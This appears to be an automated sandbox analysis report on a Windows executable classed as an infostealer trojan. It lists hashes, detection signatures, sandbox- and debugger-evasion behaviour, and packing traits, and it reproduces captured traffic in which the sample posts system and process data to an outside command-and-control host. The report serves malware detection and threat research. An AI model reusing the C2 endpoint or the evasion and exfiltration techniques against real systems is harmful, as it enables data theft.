Edit tour

Windows Analysis Report
Hqle5OSmLQ.exe

Overview

General Information

Sample name:	Hqle5OSmLQ.exe renamed because original name is a hash value
Original sample name:	4f6dab981f84c2ddb35307b748427e30.exe
Analysis ID:	1582698
MD5:	4f6dab981f84c2ddb35307b748427e30
SHA1:	1dfe133b03505c6969babf5b533620e3b240ffda
SHA256:	564084e14d92f08cd1e05273a44bfaf11dd7e539e64943ff59cc651622c18268
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Hides threads from debuggers

Infostealer behavior detected

Leaks process information

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to create an SMB header

Detected potential crypto function

Entry point lies outside standard sections

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Hqle5OSmLQ.exe (PID: 8060 cmdline: "C:\Users\user\Desktop\Hqle5OSmLQ.exe" MD5: 4F6DAB981F84C2DDB35307B748427E30)

cleanup

HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 442494Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 34 33 33 37 36 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Tue, 31 Dec 2024 08:45:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Tue, 31 Dec 2024 08:45:33 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.css
Source: Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.jpg
Source: Hqle5OSmLQ.exe, Hqle5OSmLQ.exe, 00000000.00000003.1525947436.0000000001F6C000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526346109.0000000001FA9000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1550422328.0000000001FAC000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526031038.0000000001FA6000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526592917.0000000001FAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZ
Source: Hqle5OSmLQ.exe, 00000000.00000003.1525947436.0000000001F6C000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526346109.0000000001FA9000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1550422328.0000000001FAC000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526031038.0000000001FA6000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1526592917.0000000001FAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZE_
Source: Hqle5OSmLQ.exe, 00000000.00000002.1550090351.0000000001F3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
Source: Hqle5OSmLQ.exe, 00000000.00000002.1550000309.0000000001F0E000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000003.1525947436.0000000001F42000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1550125592.0000000001F45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
Source: Hqle5OSmLQ.exe, 00000000.00000003.1526574789.0000000001F38000.00000004.00000020.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1550090351.0000000001F3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738ff::3
Source: Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
Source: Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
Source: Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: Hqle5OSmLQ.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: Hqle5OSmLQ.exe, Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://httpbin.org/ipbefore

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

System Summary

PE file contains section with special chars

Source: Hqle5OSmLQ.exe	Static PE information: section name:
Source: Hqle5OSmLQ.exe	Static PE information: section name: .idata
Source: Hqle5OSmLQ.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F79FE4	0_3_01F79FE4
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F77C3C	0_3_01F77C3C
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F79FE4	0_3_01F79FE4
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F77C3C	0_3_01F77C3C
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F79FE4	0_3_01F79FE4
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F77C3C	0_3_01F77C3C
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F79FE4	0_3_01F79FE4
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F77C3C	0_3_01F77C3C
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00AF05B0	0_2_00AF05B0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00AF6FA0	0_2_00AF6FA0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00BAB180	0_2_00BAB180
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00B1F100	0_2_00B1F100
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00BB00E0	0_2_00BB00E0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E6E050	0_2_00E6E050
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E6A000	0_2_00E6A000
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00B46210	0_2_00B46210
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00BAE3E0	0_2_00BAE3E0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00BAC320	0_2_00BAC320
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00BB0420	0_2_00BB0420
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E34410	0_2_00E34410
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00AEE620	0_2_00AEE620
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00B4A7F0	0_2_00B4A7F0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E64780	0_2_00E64780
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00BAC770	0_2_00BAC770
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E46730	0_2_00E46730
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00B9C900	0_2_00B9C900
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00AEA960	0_2_00AEA960
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00AF4940	0_2_00AF4940
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00CB6AC0	0_2_00CB6AC0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00D9AAC0	0_2_00D9AAC0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E58BF0	0_2_00E58BF0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00AECBB0	0_2_00AECBB0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00C74B60	0_2_00C74B60
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00D9AB2C	0_2_00D9AB2C
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E6CC90	0_2_00E6CC90
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E5CD80	0_2_00E5CD80
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E64D40	0_2_00E64D40
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00DFAE30	0_2_00DFAE30
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00BAEF90	0_2_00BAEF90
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00BA8F90	0_2_00BA8F90
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E32F90	0_2_00E32F90
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00B04F70	0_2_00B04F70
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00AF10E6	0_2_00AF10E6
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E4D430	0_2_00E4D430
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E535B0	0_2_00E535B0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E356D0	0_2_00E356D0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E717A0	0_2_00E717A0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00B99880	0_2_00B99880

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: String function: 00AFCD40 appears 64 times
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: String function: 00B25340 appears 41 times
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: String function: 00AECAA0 appears 62 times
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: String function: 00AFCCD0 appears 54 times
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: String function: 00AE71E0 appears 40 times
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: String function: 00C97220 appears 89 times
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: String function: 00B24F40 appears 290 times
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: String function: 00B24FD0 appears 209 times
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: String function: 00BC44A0 appears 56 times
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: String function: 00AE73F0 appears 101 times
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: String function: 00AE75A0 appears 575 times
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: String function: 00CBCBC0 appears 89 times
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: String function: 00B250A0 appears 82 times

Source: Hqle5OSmLQ.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Hqle5OSmLQ.exe

Static PE information: Section: kowmzman ZLIB complexity 0.9945295095377332

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@10/2

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe

Code function: 0_2_00AE255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,

0_2_00AE255D

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe

Code function: 0_2_00AE29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,

0_2_00AE29FF

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe

Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Hqle5OSmLQ.exe

Virustotal: Detection: 48%

Source: Hqle5OSmLQ.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Hqle5OSmLQ.exe	String found in binary or memory: Unable to complete request for channel-process-startup

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: Hqle5OSmLQ.exe

Static file information: File size 4512256 > 1048576

Source: Hqle5OSmLQ.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x289000
Source: Hqle5OSmLQ.exe	Static PE information: Raw size of kowmzman is bigger than: 0x100000 < 0x1c0e00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe

Unpacked PE file: 0.2.Hqle5OSmLQ.exe.ae0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kowmzman:EW;sikkulpd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kowmzman:EW;sikkulpd:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: Hqle5OSmLQ.exe

Static PE information: real checksum: 0x4587f0 should be: 0x455b36

Source: Hqle5OSmLQ.exe	Static PE information: section name:
Source: Hqle5OSmLQ.exe	Static PE information: section name: .idata
Source: Hqle5OSmLQ.exe	Static PE information: section name:
Source: Hqle5OSmLQ.exe	Static PE information: section name: kowmzman
Source: Hqle5OSmLQ.exe	Static PE information: section name: sikkulpd
Source: Hqle5OSmLQ.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F6C51C push esp; iretd	0_3_01F6C50A
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F7C303 push eax; ret	0_3_01F7C309
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F6C4FC push esp; iretd	0_3_01F6C50A
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F6C51C push esp; iretd	0_3_01F6C50A
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F7C303 push eax; ret	0_3_01F7C309
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F6C4FC push esp; iretd	0_3_01F6C50A
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F6C51C push esp; iretd	0_3_01F6C50A
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F7C303 push eax; ret	0_3_01F7C309
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F6C4FC push esp; iretd	0_3_01F6C50A
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F6C51C push esp; iretd	0_3_01F6C50A
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F7C303 push eax; ret	0_3_01F7C309
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_3_01F6C4FC push esp; iretd	0_3_01F6C50A
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00E641D0 push eax; mov dword ptr [esp], edx	0_2_00E641D5
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00B62340 push eax; mov dword ptr [esp], 00000000h	0_2_00B62343
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00B9C7F0 push eax; mov dword ptr [esp], 00000000h	0_2_00B9C743
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00B3E92D push es; retf	0_2_00B3E92E
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00B20AC0 push eax; mov dword ptr [esp], 00000000h	0_2_00B20AC4
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00B41430 push eax; mov dword ptr [esp], 00000000h	0_2_00B41433
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: 0_2_00B639A0 push eax; mov dword ptr [esp], 00000000h	0_2_00B639A3

Source: Hqle5OSmLQ.exe

Static PE information: section name: kowmzman entropy: 7.9564462863177505

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Window searched: window name: FilemonClass	Jump to behavior
